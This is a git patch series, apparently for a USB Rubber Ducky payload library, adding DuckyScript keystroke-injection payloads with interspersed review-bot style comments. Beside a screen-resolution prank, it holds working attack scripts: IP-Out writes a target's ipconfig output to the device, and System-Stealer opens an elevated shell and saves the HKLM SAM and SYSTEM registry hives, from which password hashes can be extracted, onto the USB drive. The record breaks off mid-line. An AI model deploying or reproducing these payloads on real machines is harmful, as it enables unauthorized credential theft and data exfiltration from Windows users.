From 8073d4d9cd172d2dc1499293d5e1e2419b8cde1d Mon Sep 17 00:00:00 2001 From: mavisinator30001 <129871621+mavisinator30001@users.noreply.github.com> Date: Wed, 18 Sep 2024 07:30:59 -0700 Subject: [PATCH 01/19] Create Resolution_Prank.txt Added Resolution_Prank folder and related payload into said folder --- .../Resolution_Prank/Resolution_Prank.txt | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 payloads/library/prank/Resolution_Prank/Resolution_Prank.txt diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt new file mode 100644 index 0000000..f0eeb63 --- /dev/null +++ b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt @@ -0,0 +1,59 @@ +REM TITLE Resolution Prank +REM AUTHOR Mavis Coffey +REM TARGET Any system running Windows 10/11 +REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back +LED_G +DELAY 500 +CTRL GUI d +DELAY 500 +GUI i +DELAY 2000 +STRING display +ENTER +DELAY 2500 +TAB +ENTER +DELAY 200 +REPEAT 8 TAB +ENTER +VAR $CAPS_STATE = $_CAPSLOCK_ON +WHILE ($CAPS_STATE == $_CAPSLOCK_ON) +HOLD DOWN +DELAY 1000 + RELEASE DOWN + ENTER + DELAY 200 + LEFT + DELAY 200 + ENTER + + REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED + VAR $LIGHT_UP_TIMES = 20 + WHILE ($LIGHT_UP_TIMES > 0) + LED_G + DELAY 300 + LED_OFF + DELAY 300 + LED_R + DELAY 300 + LED_OFF + DELAY 300 + $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1 + END_WHILE + WAIT_FOR_CAPS_CHANGE +END_WHILE +DELAY 300 +REPEAT 12 TAB +ENTER +DELAY 200 +HOLD UP +DELAY 1000 +RELEASE UP +ENTER +DELAY 200 +LEFT +ENTER +DELAY 1000 +ALT F4 +DELAY 200 +CTRL GUI F4 From 6ad0b7836c163836984d7e54f4e7fb02a39777fe Mon Sep 17 00:00:00 2001 
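Review bot: Indentation inside the `WHILE ($CAPS_STATE == $_CAPSLOCK_ON)` body is inconsistent: `HOLD DOWN` and `DELAY 1000` sit at column 0 while `RELEASE DOWN` and every later statement of the same loop are indented, so the loop's extent is hard to read at a glance. Indent the first two statements to match the rest (`    HOLD DOWN` / `    DELAY 1000`). The only comment in the body, `REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED`, describes the LED blink but not that the loop then blocks on `WAIT_FOR_CAPS_CHANGE` until CAPS LOCK is toggled; a one-line `REM` above the `WHILE` stating that exit condition would document what the header's "toggle caps" remark refers to.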
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Fri, 20 Sep 2024 08:25:58 -0700
Subject: [PATCH 02/19] Create payload.txt Added IP-Out Ducky payload
---
.../library/credentials/IP-Out/payload.txt | 21 +++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 payloads/library/credentials/IP-Out/payload.txt
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
new file mode 100644
index 0000000..66735ca
--- /dev/null
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -0,0 +1,21 @@
+REM Title: IP-Out
+REM Author: Mavis Coffey
+REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
+REM Target: Any Windows System
+REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+ATTACKMODE HID STORAGE
+DELAY 500
+GUI r
+DELAY 300
+STRING Powershell
+ENTER
+DELAY 1000
+STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
+ENTER
+WAIT_FOR_STORAGE_ACTIVITY
+WAIT_FOR_STORAGE_INACTIVITY
+ALT F4
+ATTACKMODE OFF
+REM And should the attacker want to make sure the payload was successful:
+WAIT_FOR_BUTTON_PRESS
+ATTACKMODE STORAGE
From 8293bf5d4d014e656ff017bf2f44b927a0ee4ac8 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Fri, 20 Sep 2024 08:28:44 -0700
Subject: [PATCH 03/19] Update payload.txt Changed author comment to display my username rather than my real name
---
payloads/library/credentials/IP-Out/payload.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index 66735ca..41481a9 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
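Review bot: The `REM Description` line says the payload prints the current IP, but the `STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8` line writes the whole `ipconfig` report — every adapter's addresses, gateways and DNS settings — to the removable drive, so the header understates what ends up in `exfil.txt`. Suggest `REM Description: Opens a powershell window and writes the full ipconfig output (all adapters) to exfil.txt on the BadUSB`. The drive letter `D:` is likewise only visible inside that command line; the header should state that the path is a fixed assumption about where the storage volume mounts, since nothing in the payload checks it.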
@@ -1,5 +1,5 @@
 REM Title: IP-Out
-REM Author: Mavis Coffey
+REM Author: Mavisinator30001
 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
 REM Target: Any Windows System
 REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
From cf0c83d37c939c86dd885d152406f828b64d7f86 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Fri, 20 Sep 2024 08:30:00 -0700
Subject: [PATCH 04/19] Update and rename Resolution_Prank.txt to payload.txt Changed author name to my username rather than real name. Changed payload file name to payload.txt
---
.../Resolution_Prank/{Resolution_Prank.txt => payload.txt} | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
rename payloads/library/prank/Resolution_Prank/{Resolution_Prank.txt => payload.txt} (97%)
diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/payload.txt
similarity index 97%
rename from payloads/library/prank/Resolution_Prank/Resolution_Prank.txt
rename to payloads/library/prank/Resolution_Prank/payload.txt
index f0eeb63..b171cf3 100644
--- a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt
+++ b/payloads/library/prank/Resolution_Prank/payload.txt
@@ -1,5 +1,5 @@
 REM TITLE Resolution Prank
-REM AUTHOR Mavis Coffey
+REM AUTHOR Mavisinator30001
 REM TARGET Any system running Windows 10/11
 REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back
 LED_G
From 0f85a6936e8f97b6947101928e5689d5f90b8b23 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Thu, 26 Sep 2024 06:09:19 -0700
Subject: [PATCH 05/19] Update payload.txt
---
.../library/credentials/IP-Out/payload.txt | 55 ++++++++++++++++---
1 file changed, 47 insertions(+), 8 deletions(-)
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 41481a9..8b2dc8e 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt 
@@ -2,20 +2,59 @@ REM Title: IP-Out REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System -REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +DEFINE #DRIVELABEL D +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION ATTACKMODE HID STORAGE DELAY 500 GUI r DELAY 300 -STRING Powershell -ENTER +STRINGLN Powershell DELAY 1000 -STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8 -ENTER +STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8 WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY ALT F4 ATTACKMODE OFF -REM And should the attacker want to make sure the payload was successful: -WAIT_FOR_BUTTON_PRESS -ATTACKMODE STORAGE +HIDE_PAYLOAD From a74d21e84871e42705a58bf3c7cd2d25b4b50cbd Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:16:19 -0700 Subject: [PATCH 06/19] Create readme.md --- payloads/library/credentials/IP-Out/readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 payloads/library/credentials/IP-Out/readme.md diff --git a/payloads/library/credentials/IP-Out/readme.md b/payloads/library/credentials/IP-Out/readme.md new file mode 100644 index 0000000..13ed7c1 --- /dev/null +++ b/payloads/library/credentials/IP-Out/readme.md @@ -0,0 +1,12 @@ +# IP-OUT +This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB. + + + + + +## Useful Tips + +**Change #DRIVELABEL to your own personal drive label if it isn't already** + +Remember: Do not use this for unethical hacking practices! This is for educational purposed only! From 5ed41467e3a6d290bf3dd9e09efbdc21df97510f Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:24:22 -0700 Subject: [PATCH 07/19] Update payload.txt --- payloads/library/credentials/IP-Out/payload.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 8b2dc8e..734c9d6 100644 
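Review bot: `DEFINE #DRIVELABEL D` is placed above the `EXTENSION PASSIVE_WINDOWS_DETECT` block, yet the extension's own `REM_BLOCK DOCUMENTATION` says the extension should be the first thing in the payload apart from `ATTACKMODE`; moving the DEFINE below `END_EXTENSION`, next to the `STRINGLN ipconfig ... #DRIVELABEL:\exfil.txt` line that uses it, keeps the file consistent with the vendored instructions. The copied `REM_BLOCK EXAMPLE USAGE AFTER EXTENSION ... END_REM` section is sample text that does nothing here and repeats the documentation block; a one-line `REM` saying where `$_OS` is consumed would carry the same information. As of this hunk `$_OS` is computed but nothing after `END_EXTENSION` reads it, so the detection has no effect on the `ATTACKMODE HID STORAGE` sequence that follows. The hunk starts at the file's second line; the `REM Title` line is outside it.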
--- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -46,6 +46,9 @@ EXTENSION PASSIVE_WINDOWS_DETECT END_IF END_REM END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF ATTACKMODE HID STORAGE DELAY 500 GUI r From 566683c4289e6faa3a0e06b24247d3488f161cd0 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:25:51 -0700 Subject: [PATCH 08/19] Update payload.txt --- .../prank/Resolution_Prank/payload.txt | 50 +++++++++++++++++-- 1 file changed, 47 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Resolution_Prank/payload.txt b/payloads/library/prank/Resolution_Prank/payload.txt index b171cf3..8761e71 100644 --- a/payloads/library/prank/Resolution_Prank/payload.txt +++ b/payloads/library/prank/Resolution_Prank/payload.txt 
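Review bot: The added guard `IF $_OS != WINDOWS` is written without the parentheses and `THEN` that the extension's own example, visible in the context lines just above, uses (`IF ($_OS == WINDOWS) THEN`); keeping one form makes the file's conditionals read alike, and if the interpreter is strict about the `IF ( ... ) THEN` shape the shorter form may not compile — worth confirming against the DuckyScript reference. Suggest `IF ($_OS != WINDOWS) THEN`. The same unparenthesized guard is added to the Resolution_Prank payload in PATCH 08 and copied into exfiltration/IP-Out in PATCH 15, so all three should change together.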
@@ -1,15 +1,59 @@ REM TITLE Resolution Prank REM AUTHOR Mavisinator30001 REM TARGET Any system running Windows 10/11 -REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back +REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF LED_G DELAY 500 CTRL GUI d DELAY 500 GUI i DELAY 2000 -STRING display -ENTER +STRINGLN display DELAY 2500 TAB ENTER From 4e8942635561336801249efd21f0f54c18542666 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:29:23 -0700 Subject: [PATCH 09/19] Create readme.md --- payloads/library/prank/Resolution_Prank/readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 payloads/library/prank/Resolution_Prank/readme.md 
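Review bot: The reworded `REM DESCRIPTION` line mixes verb forms: `Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back`. Suggest `REM DESCRIPTION Goes into Windows settings and changes the screen resolution; when finished, toggle CAPS LOCK to change the display back`, which also names the key the later `WAIT_FOR_CAPS_CHANGE` waits on. The rest of the payload, including the WHILE loop that blocks on that key, continues outside the hunk.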
diff --git a/payloads/library/prank/Resolution_Prank/readme.md b/payloads/library/prank/Resolution_Prank/readme.md
new file mode 100644
index 0000000..9e116dd
--- /dev/null
+++ b/payloads/library/prank/Resolution_Prank/readme.md
@@ -0,0 +1,5 @@
+# Resolution Prank
+
+This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
+
+### Somewhat resource dependent, may not work on older computers
From c8c6a75d33f3a79809d2faa138465bbae60a3392 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Thu, 26 Sep 2024 07:42:03 -0700
Subject: [PATCH 10/19] Rename readme.md to README.md
---
payloads/library/prank/Resolution_Prank/{readme.md => README.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename payloads/library/prank/Resolution_Prank/{readme.md => README.md} (100%)
diff --git a/payloads/library/prank/Resolution_Prank/readme.md b/payloads/library/prank/Resolution_Prank/README.md
similarity index 100%
rename from payloads/library/prank/Resolution_Prank/readme.md
rename to payloads/library/prank/Resolution_Prank/README.md
From 420a174f938c3bd6df09e838d90dcb91ee4767cb Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Thu, 26 Sep 2024 07:42:38 -0700
Subject: [PATCH 11/19] Rename readme.md to README.md
---
payloads/library/credentials/IP-Out/{readme.md => README.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename payloads/library/credentials/IP-Out/{readme.md => README.md} (100%)
diff --git a/payloads/library/credentials/IP-Out/readme.md b/payloads/library/credentials/IP-Out/README.md
similarity index 100%
rename from payloads/library/credentials/IP-Out/readme.md
rename to payloads/library/credentials/IP-Out/README.md
From a323fc328137866175223a13798ace9af0f761d1 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Tue, 15 Oct 2024 14:10:08 -0400
Subject: [PATCH 12/19] Update payload.txt
---
payloads/library/credentials/IP-Out/payload.txt | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index 734c9d6..c9746ef 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -54,8 +54,8 @@ DELAY 500
 GUI r
 DELAY 300
 STRINGLN Powershell
-DELAY 1000
-STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
+DELAY 1000DEFINE #DRIVELABEL DUCKY
+STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
 ALT F4
From 1a5aa0bd0828103ce7bf09ea7e658d42748cf6da Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Fri, 18 Oct 2024 11:26:00 -0400
Subject: [PATCH 13/19] Update payload.txt
---
payloads/library/credentials/IP-Out/payload.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index c9746ef..016761b 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -54,7 +54,8 @@ DELAY 500
 GUI r
 DELAY 300
 STRINGLN Powershell
-DELAY 1000DEFINE #DRIVELABEL DUCKY
+DELAY 1000
+DEFINE #DRIVELABEL DUCKY
 STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
From 083951025f87474a1b98bd2c69712637569778a3 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Fri, 18 Oct 2024 14:43:32 -0400
Subject: [PATCH 14/19] Added System-Stealer to exfiltration library
---
.../exfiltration/System-Stealer/payload.txt | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 payloads/library/exfiltration/System-Stealer/payload.txt
diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt
new file mode 100644
index 0000000..85d2db0
--- /dev/null
+++ b/payloads/library/exfiltration/System-Stealer/payload.txt
@@ -0,0 +1,70 @@ +REM TITLE System Stealer +REM AUTHOR mavisinator30001 +REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both +REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise! +REM DISCLAIMER This is for educational purposes ONLY +DELAY 1000 +ATTACKMODE HID STORAGE +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF ($_OS == WINDOWS) THEN + INJECT_MOD GUI R + DELAY 500 + STRING cmd + DELAY 1000 + CTRL-SHIFT-ENTER + DELAY 750 + LEFT + ENTER + DELAY 1000 + REM Change $DRIVELABEL to the storage label of your duck + DEFINE #DRIVELABEL D: + STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save + WAIT_FOR_STORAGE_ACTIVITY + WAIT_FOR_STORAGE_INACTIVITY + STRINGLN reg save HKLM\system #DRIVELABEL/system.save + WAIT_FOR_STORAGE_ACTIVITY + WAIT_FOR_STORAGE_INACTIVITY +ELSE + STOP_PAYLOAD +END_IF 
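Review bot: The configuration comment and the value it describes disagree twice: `REM Change $DRIVELABEL to the storage label of your duck` names a `$` variable while the next line declares `DEFINE #DRIVELABEL D:`, and `D:` is a drive letter rather than a storage label, so a reader following the comment will look for the wrong identifier and the wrong kind of value. Suggest `REM Change #DRIVELABEL to the drive letter the Duck's storage mounts as (e.g. D:)`, or make the value a label if that is what is meant; the same `$DRIVELABEL` wording is carried over into the PATCH 18 hunk of this file. The `REM DESCRIPTION` line describing the output as "encrypted system information" also understates it: the two `STRINGLN reg save HKLM\sam ...` / `HKLM\system ...` lines write complete copies of those registry hives to the drive, and the header should say so plainly so anyone reading the payload, or triaging `sam.save`/`system.save` found on a device, knows exactly what was exported, e.g. `REM DESCRIPTION Saves copies of the HKLM\SAM and HKLM\SYSTEM registry hives to sam.save and system.save on the Duck's storage`.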
From 81807425f59d96cbbe590f41a4603fdb218d0701 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:56:10 -0400 Subject: [PATCH 15/19] Create payload.txt --- .../library/exfiltration/IP-Out/payload.txt | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 payloads/library/exfiltration/IP-Out/payload.txt diff --git a/payloads/library/exfiltration/IP-Out/payload.txt b/payloads/library/exfiltration/IP-Out/payload.txt new file mode 100644 index 0000000..016761b --- /dev/null +++ b/payloads/library/exfiltration/IP-Out/payload.txt 
@@ -0,0 +1,64 @@ +REM Title: IP-Out +REM Author: Mavisinator30001 +REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB +REM Target: Any Windows System +REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +DEFINE #DRIVELABEL D +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF +ATTACKMODE HID STORAGE +DELAY 500 +GUI r +DELAY 300 +STRINGLN Powershell +DELAY 1000 +DEFINE #DRIVELABEL DUCKY +STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } +WAIT_FOR_STORAGE_ACTIVITY +WAIT_FOR_STORAGE_INACTIVITY +ALT F4 +ATTACKMODE OFF +HIDE_PAYLOAD From 63e0c186187553f62893f79b9513317207c8fd42 Mon Sep 17 00:00:00 2001 
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:56:43 -0400 Subject: [PATCH 16/19] Create README.md --- payloads/library/exfiltration/IP-Out/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 payloads/library/exfiltration/IP-Out/README.md diff --git a/payloads/library/exfiltration/IP-Out/README.md b/payloads/library/exfiltration/IP-Out/README.md new file mode 100644 index 0000000..13ed7c1 --- /dev/null +++ b/payloads/library/exfiltration/IP-Out/README.md @@ -0,0 +1,12 @@ +# IP-OUT +This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB. + + + + + +## Useful Tips + +**Change #DRIVELABEL to your own personal drive label if it isn't already** + +Remember: Do not use this for unethical hacking practices! This is for educational purposed only! From 8be0f9a0923d61839862ec6c348d18ba436bc4a5 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:57:10 -0400 Subject: [PATCH 17/19] Delete payloads/library/credentials/IP-Out directory --- payloads/library/credentials/IP-Out/README.md | 12 ---- .../library/credentials/IP-Out/payload.txt | 64 ------------------- 2 files changed, 76 deletions(-) delete mode 100644 payloads/library/credentials/IP-Out/README.md delete mode 100644 payloads/library/credentials/IP-Out/payload.txt diff --git a/payloads/library/credentials/IP-Out/README.md b/payloads/library/credentials/IP-Out/README.md deleted file mode 100644 index 13ed7c1..0000000 --- a/payloads/library/credentials/IP-Out/README.md +++ /dev/null 
@@ -1,12 +0,0 @@
-# IP-OUT
-This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
-
-
-
-
-
-## Useful Tips
-
-**Change #DRIVELABEL to your own personal drive label if it isn't already**
-
-Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
deleted file mode 100644
index 016761b..0000000
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ /dev/null
@@ -1,64 +0,0 @@ -REM Title: IP-Out -REM Author: Mavisinator30001 -REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB -REM Target: Any Windows System -REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY -DEFINE #DRIVELABEL D -EXTENSION PASSIVE_WINDOWS_DETECT - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - Windows fully passive OS Detection and passive Detect Ready - Includes its own passive detect ready. - Does not require additional extensions. - - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - $_OS will be set to WINDOWS or NOT_WINDOWS - See end of payload for usage within payload - END_REM - - REM CONFIGURATION: - DEFINE #MAX_WAIT 150 - DEFINE #CHECK_INTERVAL 20 - DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE #NOT_WINDOWS 7 - - $_OS = #NOT_WINDOWS - - VAR $MAX_TRIES = #MAX_WAIT - WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == 